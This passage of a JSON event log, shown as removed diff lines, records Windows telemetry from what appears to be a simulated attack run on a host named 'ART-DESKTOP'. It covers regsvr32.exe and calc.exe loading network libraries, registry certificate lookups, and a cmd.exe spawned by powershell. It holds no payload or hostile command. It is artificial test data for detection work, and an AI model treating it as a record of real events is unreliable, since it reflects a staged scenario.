"{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242460000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "pid": 1284, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", - "timestamp": 131883573242300000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "netapi32.dll", - "image_path": "C:\\Windows\\System32\\netapi32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242759984, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "wkscli.dll", - "image_path": "C:\\Windows\\System32\\wkscli.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573242920000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "edputil.dll", - "image_path": "C:\\Windows\\System32\\edputil.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "secur32.dll", - "image_path": "C:\\Windows\\System32\\secur32.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243080000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "image_load", - "image_name": "wininet.dll", - "image_path": "C:\\Windows\\System32\\wininet.dll", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Content\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Cookies\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "event_type": "registry", - "pid": 4724, - "process_name": "calc.exe", - "process_path": "C:\\Windows\\System32\\calc.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\History\\CachePrefix", - "registry_value": "CachePrefix", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4664, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573243260000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "process", - "pid": 7428, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "terminate", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243230000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573243390000, - "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" - }, - { - "event_type": "process", - "pid": 4664, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": 